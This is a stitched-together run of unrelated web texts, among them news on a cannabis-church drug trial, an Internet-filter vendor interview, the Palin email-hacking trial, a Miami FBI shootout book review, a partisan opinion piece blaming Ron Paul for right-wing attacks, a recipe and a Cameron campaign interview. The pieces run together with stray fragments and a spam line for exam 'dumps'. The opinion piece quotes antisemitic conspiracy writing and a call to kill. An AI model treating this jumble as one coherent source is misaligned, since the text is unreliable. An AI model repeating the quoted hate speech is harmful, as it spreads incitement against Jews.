Rev. Brother Peter Styrsky sits in the witness box and answers his lawyer ’s questions with a crinkly smile .
With his grey beard , white hemp skullcap and glasses on his nose , he looks more like an avuncular rabbi than an accused drug trafficker .
But Styrsky , 52 , and Rev. Brother Shahrooz Kharaghani , 31 , are charged with trafficking in marijuana and hashish after police raided their church — Beaches Mission of God — on Queen St. E. on Oct. 25 , 2006 .
In a constitutional challenge to Canada ’s drug laws , however , the two men argue that the cannabis plant is sacred to their religion , the Assembly of the Church of the Universe ( COU ) , which claims about 35 active ministers and 4,000 members across Canada .
“ It ’s the most spiritual thing that has ever happened to me , ” Styrsky testified Wednesday .
The defendants are asking Ontario Superior Court Justice Thea Herman to rule that Canada ’s Controlled Drugs and Substances
Act has no force or effect with regards to cannabis because it infringes on their freedom of religion .
Cannabis is a sacred substance whose consumption brings adherents closer to God , Styrsky told his lawyer Paul Lewin .
“ Every time we use it , that connection is there and is undeniable , ” said Styrsky , who ran for Toronto mayor in 2006 , getting 945 votes .
The Crown argues otherwise , however .
The men ’s sale of marijuana and the beliefs underlying it lack the essential characteristics of a religion , prosecutors say .
“ The COU offers no insight or answers into the existential questions ( of ) ‘ ultimate concern ’ which are the chief domain of religion ; offers no comprehensive system of belief by which to live and offers no moral or ethical code , ” federal Crowns Nicholas Devlin and Donna Polgar say in written submissions .
“ It offers only marijuana — however and wherever individuals want it . ”
The motion to strike down Canada ’s cannabis prohibitions is expected to take a month , with both sides calling several witnesses .
The Crown will draw on the testimony of religious experts .
It is the third time church members have raised religious Charter issues in defence of their cannabis use , but this is the fullest airing yet of the question .
To bolster the church ’s claim to be a religious institution , Lewin presented to his client for comment various pieces of signage , framed artwork and boxes of religious books that filled the church — also known as the G13 Mission — at the time of the raid .
Styrsky smiled benignly at a framed print of a stylized marijuana plant that was displayed prominently in the church : “ In a nutshell , that ’s our cross .
It ’s a tree , tree of life , tree of knowledge .
It ’s the basis of our religion , ” he said .
Lewin and Kharaghani ’s lawyer , George Filipovic , are also challenging the law on a broader basis : that it violates all religions that are based on beliefs in the inherent goodness of the marijuana plant , such as the Rastafarians .
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
But the Crown argues that even if the court finds that the church ’s activities are protected as religious practices , the law ’s prohibitions on trafficking are “ reasonable and demonstrably justifiable limits ” to the freedom of religion .
The pre-trial hearing continues Thursday .
Checking through web stats I noticed OS X Daily is getting frequent visits by individuals running Mac OS X 10.7 , an operating system that generally nobody knows much about at the moment .
Looking around on the web I found that we are n’t the only ones , with both MacRumors and MacNN reporting the same uptick in 10.7 user visits .
Google Analytics shows the visitors as ‘ Intel 10.7 ’ and it ’s possible some are just user_agent spoofing but based on the wide reports I think it ’s safe to assume it ’s an early beta version being used by people inside Apple .
It really makes you wonder what 10.7 holds for Mac users future , there ’s rumors of it being 64 - bit only , having a new fancy GUI , more cloud integration and features , amongst other things , all of which are impossible to verify and are really based on nothing more than rumors and speculation .
It ’s safe to assume that Mac OS X 10.7 will probably not be called Ceiling Cat … but if MacRumors is right , perhaps we ’ll get some more information and see a developer preview ( sans new GUI , of course ) at WWDC 2010 ?
I ’m told Marvel Studios is in final negotiations for Buffy the Vampire Slayer series architect Joss Whedon to direct Marvel Studios ’ The Avengers .
That ’s the fast - tracked film that would amount to an all - star team of Marvel superheros , including Iron Man ( Robert Downey Jr. ) , Captain America ( Chris Evans ) , Thor ( Chris Hemsworth ) , as well as SHIELD leader Nick Fury ( Samuel L. Jackson ) .
Other signature superheros will likely be involved , but I ’ve listed the actors in active superhero duty .
Whedon has been rumored for this job for awhile , and is high on the fanboy wish - list .
He ’s an interesting choice : despite his writing / producing TV series resume , his lone feature directing effort , Serenity , was not a hit .
After Iron Man 2 , Marvel has three pictures left on a distribution deal with Paramount before it moves to Disney , and the studio has been churning them out .
Iron Man 2 gets released in May , Captain America will begin shooting this summer in Europe , Thor is in production , and Marvel Studios just set Pete Sollett to direct Runaways , based on the comic book series created by Lost writer Brian K. Vaughan .
Whedon has written installments of the latter , so he knows how to make those superheros fly .
Marvel has considered all of the individual superhero movies to be an intro to The Avengers , so the wanna - see on this one will be huge .
The film will be released in the first weekend of May , 2012 .
M86's Internet filter technology was originally designed for schools , not for an entire country
Internet filtering wo n't prevent people deliberately looking for inappropriate material from accessing blocked content , according to security vendor , M86 Security .
Six of the nine ISP participants in the URL - based Internet filter trial last year used M86’s R3000 filtering kit .
The technology was originally developed for the education sector and was then applied to enterprise businesses .
“ When the filter was first launched 10 years ago , I do n't think anybody would have thought it would be applied on a national scale , ” M86 COO , Bruce Green , said .
“ We talk hundreds of thousands of users and even the biggest enterprise might have half a million .
Now we ’re talking about millions of users when you go into the consumer section and it was never really designed for that purpose . ”
Nonetheless , the technology can still be applied to ISP networks .
While a filter may be effective in guarding against accidental access of inappropriate content online , it may not be as useful in preventing people who are seeking to access such material , according to Green .
“ To stop a child accidentally hitting a bunch of keys and accessing something , is doable , ” he said .
“ But a lot of investment goes into cybercrime and if somebody is trying to bypass the filter to share something they want , they ’re going to bypass anything you ’ve got up .
“ In some ways , because it is such a publicised issue , I ’m sure people are already working to get around it . ”
Having worked at UK telco giant , British Telecom , Green can understand ISPs ' apprehension over a mandatory clean - feed .
“ As soon as you step into any form of censorship – and some people do perceive it as that – companies would want to stay away because it then becomes political , ” he said .
Green shares Prime Minister Kevin Rudd ’s sentiments regarding the need to protect citizens against ‘ indecent ’ material but questions how far the filter will go in terms of deciding what content to block .
" But once you implement these sorts of things , I think what everybody is concerned with is how can you control where it goes then ? "
Green said .
The Federal Government conceded ISP - level filtering is not a silver bullet to preventing access to inappropriate material .
It claimed the filter will only block refused classification content which will encompass content depicting child pornography .
M86 has yet to settle on pricing should it chose to supply technology for the proposed Internet filter .
The vendor typically charges a set amount per user but due to the large scale of the project the company is contemplating a cost per server implementation pricing model for ISPs .
But Green said it will depend on whether the Federal Government is paying for the technology and how much it is willing to fork out .
Marshal8e6 rebranded itself as M86 late last year .
Russian newspaper RIA Novosti said the Kremlin may have jumped the gun in announcing the deal already had been signed , but :
A Kremlin source who had requested anonymity said earlier in the day the two countries had reached agreement on all the documents for a new strategic arms pact , which could be signed in Prague .
And you can bet that the teabaggers will have a lot to say about Obama visiting communist Czechoslovakia ...
The Times :
The new pact would replace the Strategic Arms Reduction Treaty of 1991 , which expired in December , and would require both sides to reduce their warheads and launchers by more than one - quarter .
The agreement is the most significant accomplishment so far for Mr. Obama ’s policy of trying to " reset " relations with Russia .
It is intended to pave the way for another more far - reaching round of reductions later in his term .
And that 's been a key , all along .
Earlier this month , it was reported that Obama wanted to dramatically reduce our nuclear weapons arsenal , and make our defenses based more on functional conventional weapons .
Which is a visionary ideal , on many levels , from promoting non-proliferation to truly protecting our national security to saving a fiscal fortune that is being wasted on unnecessary weapons systems .
It also was reported , last summer , that Obama and Medvedev wanted to take a step beyond previous arms reductions .
The Times :
Mr. Obama met at the White House on Wednesday morning with Senators John F. Kerry of Massachusetts and Richard G. Lugar of Indiana , the senior Democrat and Republican on the Senate Foreign Relations Committee , to brief them on the status of the treaty .
To go into effect , a signed treaty would have to be ratified both by the United States Senate and by the Russian parliament .
And that 's where the fun will begin .
Lugar can be sensible about some foreign policy and arms issues .
Particularly for a Republican .
And that should help .
But there 's no doubt some of his colleagues will pressure him to go shrill , and claim that Obama is endangering Liz Cheney .
But Lugar has a history of getting along with Obama , particularly on arms issues .
Which bodes well .
Obama won the Nobel Prize precisely because of his efforts on this issue .
He takes it seriously in ways many of his predecessors did n't .
Getting this done , and pushing it forward , could become the greatest achievement of his presidency , and one of the most important achievements of any presidency .
For many of us sustainable sourcing is crucial .
All the coffee you buy from coffee party usa arrives in a coffee bag made with certified compostable films which have a high barrier layer for oxygen and moisture , and yet strong and durable .
We believe in being good to our environment
First , let me say I ’m a fan of solar power when done correctly and without financial carrots hung out for electricity generation that entice abuse of the system .
I put solar on my own home .
Bishop
Hill points out that some solar power installations in Spain were producing power at night .
He writes of what was thought to be a joke :
… The prices paid for green energy were so high that it appeared to be profitable to generate that energy by shining conventionally fuelled arclights on the solar panels .
But finds truth to be stranger than fiction :
Although the exact details are slightly different there is now an intriguing report of the scam in practice .
The text is based on a machine translation of the original German text :
After press reports , it was established during inspections that several solar power plants were generating current and feeding it into the net at night .
To simulate a larger installation capacity , the operators connected diesel generators .
“ This is just the tip of the iceberg , ” said one industry expert to the newspaper “ El Mundo ” , which brought the scandal to light .
If solar systems apparently produce current in the dark , will be noticed sooner or later .
However , if electricity generators were connected during daytime , the swindle would hardly be noticed .
As I said last time around , this is the insanity of greenery .
Here is the Google Translation of the article .
You too can generate energy with your solar system at night , all you need is an 850 million candlepower WWII era searchlight , now available for rent .
Hey , it ’s not crazy .
There are so many fees , taxes , add ons , etc to power bills here in California now it is actually cheaper to generate your own electricity running a diesel generator than it is to buy it from PG&E .
Anyone have a used diesel - electric locomotive I can buy ?
Sponsored IT training links :
Download the 640 - 816 study pack with latest 70 - 647 dumps and pass 650 - 568 exam on first try guaranteed .
Share this : Print
Email
Twitter
Facebook
Pinterest
LinkedIn
Reddit
Like this : Like Loading ...
Grab it on the App Store .
The Japan Food Addict app is here !
Kinpira is a Japanese cooking style in which strips of ingredients are stir fried and seasoned with sugar and soy sauce .
Kinpira gobou is the most popular kinpira dish .
I made potato kinpira before .
This is popular item for Japanese bento ( lunch boxes ) .
Yield : 2 servings
Time : 20 minutes Spices 1 tbsp sake
1 tbsp soy sauce
1 tbsp mirin
1 tbsp sugar
1/2 tsp sesame oil Ingredients 2 oz sliced carrots
4 oz sliced gobou
2 tsp sesame seeds Preparation Mix spices together in a small bowl ( sake , soy sauce , sugar , and mirin )
Heat the sesame oil in a frying pan then stir - fry gobou and carrot for 2 minutes over medium heat Add mixed spices in the pan , and cook for 2 minutes on low heat Sprinkle sesame on top and serve !
JapanFoodAddict.com : Vegetables
A recent thread on that discussed the Miami firefight caused me to want to know more about this important firefight .
So , I ordered the book ,
I took the book with me on the recent flight to Las Vegas to the SHOT Show and read it in one sitting .
It was a real eye - opener .
In short , in Miami , in 1986 , the FBI had a shootout with two bad guys and it was the biggest firefight in the FBI ’s recent history .
The two bad guys , Platt and Matix , were killed .
But two FBI Agents were also killed , and three FBI Agents were very seriously wounded , and two others were injured .
Dr. Anderson decided to do a very detailed analysis of the firefight to try to learn as much as possible from the fight .
His analysis is recognized as the “ best ” by the FBI , and they use it to teach new agents in their training .
In addition , many police agencies have also included this information in their training .
Many lives have been saved as a result .
Most of us that are kind of “ gunny ” have heard of this fight , but many have drawn wrong conclusions , due to their not knowing all the facts .
I will not try to cover all the details of the book , but would encourage anyone interested in ballistics to get a copy of this book and read it and study it .
I would like to list some of the lessons I learned about the firefight from this book .
1 . Use good quality ammo .
This is one of the biggest lessons learned from this incident .
In short , the FBI was using older JHP ammo that would not always expand , and usually did not penetrate deeply enough .
Early in the fight , one of the bad guys was shot with a 9 mm round that penetrated his upper arm before entering his body .
It stopped just millimeters short of reaching his heart .
As a result , he was able to continue to fight for several minutes .
Had it reached his heart , it would have stopped him .
Based upon the failure to the bullets to reach vital organs , the FBI set a standard of requiring a minimum of 12 to 15 inches of penetration for their ammunition .
Which brings us to # 2 .
2 . A determined adversary can continue to fight , even when severely wounded many times .
The bad guys were both “ shot full of holes ” , to put it mildly .
The book had autopsy photos of both men that are pretty gruesome .
They are full of holes .
But they were tough and determined fighters , and simply would not quit , as long as they were physically able to shoot back .
The only way to STOP a bad guy is to hit vital organs or his central nervous system , and either of these things takes a lot of penetration .
3. Gunfights are not like cowboy shows on TV .
At the start of “ Gunsmoke ” , the Marshall and a bad guy face each other on a street and draw and shoot .
But real gunfights are seldom like that .
In the Miami shootout , the bad guys were under some trees and in deep shade .
The FBI Agents were in bright sunlight .
One important factor was that the FBI Agents could not clearly see the bad guys .
And when they could see them , they only saw parts of their bodies .
As Clint Smith says , “ Shoot at whatever is available , as long as it is available , until something better becomes available . ”
That ’s what the Agents did .
They shot at the bad guy ’s legs , or feet , or whatever they saw a chance to shoot .
They hit them too , but this did not cause injuries that would STOP the fight .
In one case , an Agent shot Platt in the feet with 00 buckshot , causing several very bad injuries to his feet .
It would have crippled him , but it did n’t Stop him .
He continued to fight .
Folks often ask , “ Why do we need 12 inches of penetration , it is only a few inches from the front of the chest to the heart ? ”
But it is seldom in a real firefight that you will get a shot from the front with no obstructions in front of the chest .
That ’s why 12 inches penetration is the minimum .
4 . Use the best available weapon .
Matix started the gunfight with a pistol - gripped only shotgun loaded with birdshot .
As a result he was totally ineffective and was shot and put out of the fight for several minutes .
Platt , however , brought a carbine to the fight .
As a result , he was able to do a lot of damage before being killed .
The FBI Agents were shooting mostly pistols , either 9 mm semi-autos or revolvers shooting +P .38 Special ammo .
One Agent used a 12 gauge pump shotgun .
Why did n’t the Agents have carbines ?
They did n’t know that they were going to be in a big firefight .
Just like the rest of us .
Most of us carry handguns on a daily basis , because of ease of concealment and ease of carry .
But if you knew you were going to be in a firefight , you would bring a rifle .
Also , like many police officers , these Agents thought that handguns were “ effective ” .
They were to learn that they are not .
Just imagine the “ rubber trigger nightmares ” caused by this firefight .
They shot and shot the bad guys , but the bad guys just kept on fighting .
5. Marksmanship .
One false idea that is widely spread is that the Agents were poor marksmen , but this is inaccurate .
They made many good hits on the bad guys , but pistols are pistols and rifles are rifles .
And the bad guys were not stopped by the pistol rounds .
It is very important to hit your target .
But if the round is ineffective , it will not stop the fight .
6. Gunfights are confusing .
As Dr. Anderson wrote this book , he interviewed the surviving Agents several times .
His step - by - step and shot - by - shot analysis showed that the memories of the Agents were simply wrong on several counts .
In the excitement of the fight , they did not see everything and did not correctly remember all of the things they saw .
There are many other conclusions that can be drawn from this fight , but those are a few that come to mind .
The is an excellent resource and I highly recommend reading it .
I also highly recommend applying the lessons learned .
Since the election of Barack Obama there have been several instances of “ lone wolf ” terrorism .
The media has focused a lot of attention on the cases of Nidal Hasan , the army psychiatrist who killed 13 men in a Fort Hood shooting rampage , and Umar Farouk Abdulmutallab , the Nigerian who brought explosives onto a plain destined for Detroit .
After their incidents , there was a mad rush to find out what there ideologies were , both politically and religiously .
Though both clearly had mental issues , the incidents were treated as politically motivated terror attacks .
Muslims and Africans are n’t the only people who have been involved in politically motivated attacks on the government .
Since the election of Barack Obama , there has been a resurgence of white right wing politically motivated terrorism .
Since Obama ’s election we have had several white terrorists who were motivated by racism , hatred of the government and conspiracy theories .
Of the five major incidents of white terrorism , congressman Ron Paul directly influenced four of them .
Paul ’s promotion of conspiracies , paranoia and connections to racism has led to him being a magnet for lunatics , white supremacists and conspiracy theorists .
The first Ron Paul influenced terrorist is Richard Poplawki .
Poplawski got in argument with his mother and she called the cops .
When the cops arrived Poplawski was waiting for them with a bulletproof vest and shot five police officers with an AK - 47 , wounding two and killing three , including an African American .
Poplawski ’s shooting of police officers seemingly had not motive until police looked into his background .
Poplawski was a white supremacist who frequently posted on the Neo - Nazi , extremely Pro-Ron Paul site Stormfront .
and Alex Jones ’ New World Order conspiracy theory site , Infowars .
Poplawski would post videos of Glenn Beck with Ron Paul talking about FEMA Concentration Camps onto Stormfront .
In the video , Paul would speculate that while there was no evidence of FEMA concentration camps , he still believed they might come in the future .
Poplawski was a very big conspiracy theorist , who believed that the government was being secretly run by Jews and that Obama wanted to take away his rights , specifically his right to bare arms .
Here is an online rant he wrote :
the federal government , mainstream media , and banking system in these United States are strongly under the influence of — if not completely controlled by — Zionist interest .
An economic collapse of the financial system is inevitable , bringing with it some degree of civil unrest if not outright balkanization of the continental US , civil / revolutionary / racial war . . .
This collapse is likely engineered by the elite Jewish powers that be in order to make for a power and asset grab .
Poplawski believed in the same New World order conspiracy that led to McVeigh blowing up the Alfred P. Murrah building .
His paranoia was further fueled by Ron Paul ’s conspiracy code words , a hatred for Jews and African Americans .
His act of shooting five police officers was not an act of common criminality or plain insanity , but conspiracy driven , politically motivated terrorism .
While Ron Pal cannot be blamed for Poplawski actions , his promotion of the New World Order conspiracy theory and quiet acceptance of white supremacy , combined with pro Ron Paul sites like Stormfront and Info Wars certainly had a role in Poplawski ’s mindset .
This is not to say that mental insanity did not play a role in his killing , but that his insanity was fueled by racism , paranoia and conspiracy theories .
Another Ron Paul supporter who would commit an act of terror was James Von Brunn , the man who open fired at the Holocaust museum , killing an African American security guard , Stephen Johns .
Von Brunn was part of Ron Paul meet up group and would send emails attacking the IRS and the ATF , while supporting Ron Paul .
Von Brunn had previously been arrested for kidnapping members of the Federal Reserve Board , one of Ron Paul ’s frequent targets .
Von Brunn seemed to have a similar anti-Semitic conspiracy theory to Papalowski and believed in a Illuminati group .
Here are some of Von Brunn ’s anti-Semitic conspiracy writings .
The Henrik Holappa atrocity is a metaphor for the ILLUMINATI conquest of America :
The ILLUMINATI , has captured America illegally , and is incarcerating her NOW into a Global Zionist state .
Well informed patriots are ignoring the URGENCY , the extreme DANGER confronting them .
There is sparse time remaining .
You must ACT NOW .
KILL THE ENEMY OR DIE IN THE GULAG !
Source
You want my weapons — this is how you ’ll get them .
The Holocaust is a lie .
Obama was created by Jews .
Obama does what his Jew owners tell him to do .
Jews captured America ’s money .
Jews control the mass media .
The 1st Amendment is abrogated .
Source
Another white terrorist , who was a fan of Ron Paul ideologies , is John Patrick Bedell .
Bedell drove cross country from California to Washington D.C. with two semi-automatic weapons and wounded shooting two African American guards at the Pentagon in an act of anti government rage .
John Patrick Bedell was a Ron Paul style libertarian , who was a member of the Ludwig von Mises Institute , an institute credited as being the driving force for Ron Paul ’s political and economic philosophies , which was founded and run by Ron Paul ’s former chief of staff and long time friend and companion , Lew Rockwell .
Bedell would post on the Ludwig von Mises site about how government was criminal .
Rockwell refers to the Pentagon as the Pentagram ( evil satanic symbol ) and subscribes to the John Birch society New World Order conspiracy theory .
Bedell himself was a conspiracy theorist , who believed that 9/11 was set up by the government .
We can see how the combination of conspiracy theories and anti-government sentiment led to Bedell taking out his anger on what his hero , Lew Rockwell called the “ pentagram . ”
Charles Dyer is a man who never committed a violent act against the government but proudly proclaimed himself a “ domestic terrorist . ”
Dyer was instead arrested on a domestic charge for allegedly raping a 7 - year - old girl .
While Dyer may or may not be guilty of that charge , he was definitely guilty of possessing a grenade launcher stolen from an army base .
Police also found residue that led them to believe that he had been storing explosives .
Dyer was a member of the Oathkeepers , are a paramilitary organization comprised of former and current military and law enforcement members .
The SPLC has said the Oathkeepers are concerned about a coming dictatorship , concentration camps and a general New World Order .
The Oathkeepers are headed by Stewart Rhodes , a former Ron Paul staffer .
They have received support from Glenn Beck , Lou Dobbs and conspiracy theorist radio host , Alex Jones .
To Dyer ’s credit , he is not a white supremacist .
He would engage the racists on the white supremacist site , Stormfront and criticize their racism .
However , Dyer seemed to be a full believer in the John Birch Society “ New World Order Conspiracy . ”
While Dyer was not a white supremacist , he seems motivated by the same paranoid conspiracy based ideology that motivated Bedell , Von Brunn and Poplowski .
While their is no evidence that Joe Stack , the man who flew a plane into an IRS building in Texas supported Ron Paul or his ideologies , some from Ron Paul ’s camp have supported Joe Stack .
After the incident , Chuck Baldwin , a long time Paul supporter and the man Paul endorsed to be President in 2008 wrote on the Daily Paul website :
Perhaps our friends at DHS will label Stack a “ right - wing domestic terrorist .
However , Mr. Stack apparently left behind a “ suicide manifesto ” explaining his actions .
After carefully reading Stack ’s manifesto , I am quite convinced that he was not crazy , and he was not a “ terrorist . ”
However , he was angry .
A lot of us are angry–and for many of the same reasons that Mr. Stack was angry !
While I would certainly take exception to some of the things Stack says in his manifesto , he said things that many of us are feeling .
The right wing must answer for the conspiracy theories and paranoia that drove Poplowski , Von Brunn and Bedell to violent acts against the and drove Dyer to purchase a stolen grenade launcher and explosives .
The same combination of paranoia , conspiracy theories , mixed with a strong dash of racism led Timothy McVeigh to blow up the Alfred P. Murrah building .
When CPAC , the Think Tank credited with driving the Republican party , lets conspiracy minded organizations like the Oathkeepers and the John Birch Society sponsor their national convention , and declares conspiracy theory monger , Ron Paul their straw poll winner for the Presidential nomination , it is clear that these conspiracy theories are being tolerated by Republican party at the highest levels .
During a time of economic recession when many people are angry and scared already , the conspiracy theories are enough to make already unstable people filled with hated and paranoia ; A hatred and paranoia that could easily turn to violence .
The media has been largely ignoring the New World Order , conspiracy Ron Paul connections to acts of terror , while focusing on Islamic terror .
If James von Brunn was Jamil Val Bakar and posted anti-American and Israel sentiments on an Islamic Website before shooting up the Holocaust museum , surely Fox News and the mainstream media would make it a huge story .
Same with Paplowski .
If he was posting on an radical Islamic site , not a white supremacist one , he would be branded a cop killing Islamic terrorist .
If Bedell was fan of a radical Muslim cleric or belonged to a mosque that preached hatred against the American government , he would have been branded an Islamic terrorist and the White House would be blamed for not stopping him before he went to the Pentagon with automatic weapons .
Politicians like Ron Paul and media types like Alex Jones and Glenn Beck are as guilty of drumming up paranoia and anger at the American government as Islamic clerics who refer to America as the great Satan only to see their followers turn to terrorism .
Fox News , CPAC , and the Tea Party movement must all be held accountable for the conspiracy theories and anti-government hatred and paranoia that leads people directly into violence .
RELATED STORIES
Pentagon Shooter Was Fan Of Ron Paul Think Tank
Conspiracy Theorist Right Wing Hate Groups Are At Record Levels
OPINION : Ron Paul Is A White Supremacist
OPINION : I Am Not Saying Joe Stack Is A Teabagger , But He ’s A Little
Well , it 's not much different from what you did with your N900 , but here 's how :
You need an SSH client on your computer as on ...
Sarah Palin said " bad behaviour " must have consequences
US politician Sarah Palin has testified against a former student charged with breaking into her e-mail account .
Mrs Palin told the court that the main way she communicated with her family during her 2008 vice - presidential campaign had been compromised .
David Kernell , 22 , is accused of identity theft and fraudulently gaining access to her Yahoo account .
His lawyer said the case was a prank , not a crime .
Mr Kernell , from Tennessee , could face up to 50 years in jail if convicted .
Asked by reporters if she thought the charges were excessive , Mrs Palin said : " I do n't know , but I do think there should be consequences for bad behaviour . "
Mrs Palin told the court in Knoxville , Tennessee , that she had used her Yahoo e-mail account and a Blackberry almost exclusively to communicate with her family in Alaska while campaigning on the Republican ticket in 2008 .
Earlier this week , her daughter Bristol testified that she had received harassing calls and text messages after screen shots of e-mails from the account revealed her mobile phone number .
In recent months Mrs Palin has been a prominent leader in the conservative Tea Party movement , which has opposed President Barack Obama 's health reforms and called for tax cuts .
I love a nice Belgian ale , and with the holiday season I think now is the best time to take advantage of the Christmas ales for cigar pairings .
The Oliva Serie V is a favorite of mine that I will often get a craving for .
It ’s smooth full bodied flavor with espresso , dark chocolate , and a great balance of spice allows for great pairing options .
In this tasting , I am pairing my cigar with the St. Bernardus Christmas Ale .
The pairing made for an interesting balance and really made the subtle notes of the cigar stand out .
I ’d be curious to try this pairing again after aging a bottle of the ale - beers from Belgium do well with aging and would be nice to age with cigars .
Definitely something to consider !
Oliva Serie V
Wrapper : Habano Sun Grown
Binder : Nicaraguan
Filler : Jalapa Valley Ligero
[ nggallery id=15 ]
Regulator to block Anglo from bailing out Quinn
Financial watchdog to disclose ' compelling ' evidence for investigation of insurance firm
THE Financial Regulator will block any attempts by Anglo Irish Bank to take control of Seán Quinn 's empire , the Sunday Tribune has learned .
Talks between Anglo and Quinn Group 's bondholders are continuing this weekend to find a way that would allow the nationalised bank take over Quinn Group .
However , it is understood the regulator is opposed to any deal because of concerns about the health of the insurance company and the impact a tie - up would have on Anglo .
The regulator believes it could not allow Anglo , which is facing major challenges of its own , to take responsibility for an entity for which it has no capability or expertise .
In the High Court tomorrow , the Financial Regulator – Matthew Elderfield – will disclose " compelling " new evidence to persuade the court to confirm the appointment of Grant Thornton as administrators .
Sources close to Elderfield said he is more convinced than ever that Quinn Insurance needs to be investigated for solvency breaches , the failure of internal controls and the actions of individuals within the company .
It is believed Elderfield is prepared to reveal details of a highly secretive settlement his office made with Seán Quinn in 2008 .
The regulator fined Quinn Insurance € 3.25 m , its highest ever sanction , for breaches of the Insurance Acts after the company provided loans of € 288 m to help Quinn finance his share - buying spree in Anglo .
Anglo is owed € 2.8bn by the Quinn family and it would be at the end of the queue behind other creditors , including a consortium led by UK bank Barclays , to recoup its money if the Quinn Group collapses .
The regulator stepped in to take provisional control of Quinn Insurance on 30 March because of concerns the company would be unable to pay out on claims .
Quinn Insurance provided guarantees of over € 1.2bn of its assets to cover the debts of other companies within the Quinn Group , effectively wiping out its solvency cushion .
The regulator had demanded for nearly two years that Quinn bring its solvency levels up to the required standard and was alarmed that Quinn Insurance was providing it with " unrealistic " business plans .
Quinn said last week that if the insurance company was removed from administration , there would be " no difficulty in repaying both the group and family debt as well as continuing to provide long - term employment " .
Meanwhile , Quinn 's chief rival , Aviva , is understood to be adding thousands of new customers as business leaves Quinn .
The volume of enquiries for both health and general insurance has doubled .
Insurance brokers have reported " enormous disquiet " among commercial clients , but only marginal shifts in business .
Quinn 's loss on Anglo is " undoubtedly " the biggest loss an individual has suffered on a single share using contracts for difference , financial instruments used for betting on the direction of a stock , according to David Buick of financial brokerage Cantor Fitzgerald .
Leading market historian David Schwartz described Quinn 's overall losses as " eye- watering " .
Replacing an alternator in a Chevy Silverado Truck ( GMC Sierra Truck , Suburban , Yukon , Tahoe ) is easier than you may think .
In this video , we show you exactly how it is done so that you can do it yourself and save a bunch of money .
We currently have over 70 how - to videos that you can view on our 1AAuto Youtube Channel .
Everything from headlight and taillight replacements , to door handles , to controls arms and weatherstripping .
Check them out , Subscribe to our youtube channel or add us as a friend , and let us know what you think !
In my role as convener of the ISO C++ committee , I get to field a number of questions about the committee and its process .
It occurred to me that some of them might be of more general interest , so I ’ll occasionally publish an edited version of my reply here in case other people have similar questions .
Note that the quoted questions may be paraphrased .
Today ’s question comes from someone who recently asked about why , if ISO C++ is an open standard , ISO charges for it and we ca n’t just download it for free .
The short answer is that people sometimes confuse “ open ” with “ free . ” ISO standards are n’t “ open ” like the O in FOSS , they ’re “ open ” like “ not developed behind closed doors . ”
Anyone who wants to pay for membership in their national body ( if their country participates in ISO and in the specific project in question ) is able to come join the fun .
In free - as - in - beer terms , this means that experts are welcome to come to the ISO brewery at their own expense and volunteer their time to help brew the beer , and then when the beer is ready the customers still pay ISO to drink it ( the helpers do n’t get a cut of that , only a free bottle for their personal use and the satisfaction of having brewed a mighty fine keg ) .
Longer answer follows :
ISO C++ claims to be an OPEN STANDARD .
Where can I download the OPEN STANDARD for ISO C ++.
All published ISO standards are available for sale from the ISO store , via http://iso.org.
You can purchase a copy of the latest currently published C++ standard , 14882:2003 , here for CHF 380 :
Also , your national standards body may sell a copy .
For example , the ANSI store sells a PDF version here for US $ 30 :
However , before you buy one of those , note that we ’ve been actively working on a new revision to that standard , and hope to be done in the next year or so .
You can get a free copy of the latest ( but incomplete ) draft of the C++ standard here :
Note that this is a working draft as of a couple of weeks ago ; it is not the standard currently in force , and it is not exactly the standard that will be published in the next year or two , but it is a draft of the latter that ’s in pretty good shape but will still get some editorial corrections and technical tweaks .
By the way , what does it mean , that the STANDARD of a widely used language is OPEN ?
Especially if I have to pay for it ?
All ISO standards are " open standards " in that they ’re developed in an open , inclusive process .
All member nations of ISO are eligible to participate , send experts , contribute material , vote on ballots , and so forth .
Additionally , some working groups , including C and C++ , make all of their papers and all working drafts freely available on the web , as with the link above ; the only thing a working group is not allowed to make freely available , except with special permission from ISO , is the text of the final standard it produces , because ISO reserves the right to charge for that .
Could you explain to me , what should it mean if the STANDARD of a widely used language was CLOSED ?
Generally , that means it was developed privately by some closed industry group or consortium that not everyone is allowed to join and participate in .
Some standards are developed behind closed doors controlled by some company or companies .
ISO standards are not like that .
Best wishes ,
Herb
We are sitting on the black leather sofas in a compartment at the rear of the Tory leader 's campaign coach – a zone some of his team call David Cameron 's " love pod " .
The destination this sunny Saturday morning is Essex , the county that produced Essex Man , devoted follower of Margaret Thatcher , and some of the iconic victories that punctuated the last period of Conservative rule .
Had things gone to the original campaign plan , the Conservatives would now be leaving 13 long years in opposition and cruising to a parliamentary majority in 12 days ' time .
How hard could it be to defeat a tired , three - term government led by a very unpopular prime minister with low communication skills who has presided over the worst recession since the 1930s ?
Then Nick Clegg happened , the Liberal Democrats erupted .
Everyone 's assumptions were thrown into the air and the Tory campaign was plunged into a shock that Cameron is good at masking but canot entirely disguise .
We put it to the Tory leader that he never expected to be polling in the low 30s with less than a fortnight to go .
" No , of course .
No , " he concedes immediately .
" I never thought it was going to be easy .
I 've never thought there was some sort of glide path to election success .
But the campaign has been shaken up .
No doubt about it . "
But he maintains : " I think it 's still quite possible to win .
That 's what we 're shooting for . "
This is nevertheless quite a recalibration of Tory ambition .
A month ago , they assumed a Conservative victory was pretty much inevitable .
Now their leader thinks that it is merely " quite possible " .
Of the sensational change in fortunes caused by the Lib Dem surge , he says : " The key is : can you change your approach ?
Can you think on your feet ?
Can you respond to this ? "
The way the Tories are responding is interesting .
Rather than direct more resources to try to deal with the yellow peril , they are focusing even more on Labour , believing that the slump in support for Gordon Brown makes Labour seats newly vulnerable to the Conservatives .
Cameron says that Labour - held Thurrock – today 's venue for a rally – was not on the original list of targets .
The game plan now is to try to make additional gains from Labour to compensate for not winning Lib Dem seats they had originally expected to take .
Many Tories privately say that their leader made a colossal strategic error when he gave Nick Clegg the opportunity to shine by agreeing to the televised leaders ' debates .
If Cameron fails to become prime minister , historians are likely to call it a massive blunder .
" I absolutely knew at the time that we were going to give a leg - up to the third party , " he says , insisting that he still does not regret the decision because it has been " good for our democracy " .
This morning , Cameron has suddenly launched a new idea : a proposal that , if the premiership changes between elections , an election has to be held within six months .
That is very clearly targeted at Gordon Brown .
It also flags up a Tory fear that Labour could ditch Brown for a new leader in order to facilitate a post-election coalition with the Lib Dems : " You could have someone as prime minister who was n't even in the televised debates . "
His latest proposal would be a major rule change to Britain 's democracy , which is , we remind him , parliamentary , not presidential .
The policy features nowhere in the Tory manifesto .
Is n't it a sign of panic that he is suddenly proposing a major constitutional change ?
He bridles a little : " I did n't think there was a law against announcing policies in an election .
